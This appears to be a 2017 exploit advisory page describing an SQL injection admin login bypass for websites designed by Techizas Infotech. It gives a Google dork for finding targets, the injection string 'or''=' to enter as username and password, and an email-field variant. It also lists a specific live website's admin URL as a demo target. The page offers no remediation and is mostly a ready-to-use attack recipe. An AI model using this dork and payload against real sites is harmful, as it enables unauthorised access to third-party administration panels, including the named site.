Techizas Infotech Admin login bypass

Published
Credit
Risk
2017.04.01
magelang1337
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: "Design by Techizas Infotech Pvt. Ltd"

***************************************************
# Exploit Title: Techizas Infotech Admin login bypass
# Google Dork: "Design by Techizas Infotech Pvt. Ltd"
# Date: 1/04/2017
# Author: Codename @MagelangNoobs
# Facebook: https://www.facebook.com/magelangnoobs.phtml
# Tested on: Win
***************************************************
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: 'or''='
[+] Password: 'or''='
[+] If using email, replace username with 'or''=' @mail.com
***************************************************
DEMO :
http://jnvbegusarai.org/admin/

Thanks : nginxDEX - CowoKerensteam


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com